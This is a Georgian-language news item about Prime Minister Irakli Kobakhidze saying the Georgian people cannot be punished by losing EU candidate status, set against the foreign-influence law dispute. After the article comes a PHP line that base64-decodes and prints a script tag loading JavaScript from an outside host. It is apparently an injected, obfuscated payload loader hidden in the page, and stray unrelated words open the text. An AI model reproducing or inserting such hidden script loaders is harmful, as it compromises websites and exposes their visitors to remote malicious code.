celsiusi
ავერსი შნაიდერი

პრემიერ-მინისტრ ირაკლი კობახიძის თქმით, ქართველ ხალხს ევროკავშირის კანდიდატის სტატუსის ჩამორთმევით ვერავინ დასჯის - ამის შესახებ კობახიძემ ბათუმში, ჟურნალისტის შესაბამისი კითხვის საპასუხოდ ისაუბრა.

“ქართველ ხალხს ვერავინ ვერ დასჯის. საუბრობენ კანდიდატის სტატუსის შეჩერებაზე, ამდენი ხნის განმავლობაში თვითონ საუბრობდნენ, რომ კანდიდატის სტატუსი მიანიჭეს ქართველ ხალხს და არა ხელისუფლებას, ასეთ დროს ვიღაცამ ქართველ ხალხს ჩამოართვას კანდიდატის სტატუსი, ეს ხომ სასაცილო იქნება?” - განაცხადა კობახიძემ.

საქართველოში “უცხო ძალის გავლენის გამჭვირვალობის შესახებ” კანონის ინიციირების შემდეგ ევროკავშირის ლიდერები საქართველოს მოუწოდებდნენ, არ მიეღოთ კრემლის მიერ შთაგონებული კანონი. EU-ს ლიდერები აღნიშნავენ, რომ ბლოკის კარი საქართველოსთვის ღიაა, თუმცა ქვეყნის კანონმდებლობა მასთან თანხვედრაში უნდა იყოს, არჩევანი კი საქართველოსა და ქართველ ხალხზეა - ამის შესახებ ევროკავშირის ელჩმა საქართველოში, პაველ ჰერჩინსკიმ, კიდევ ერთხელ ისაუბრა Movement-თან ინტერვიუში.

127
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");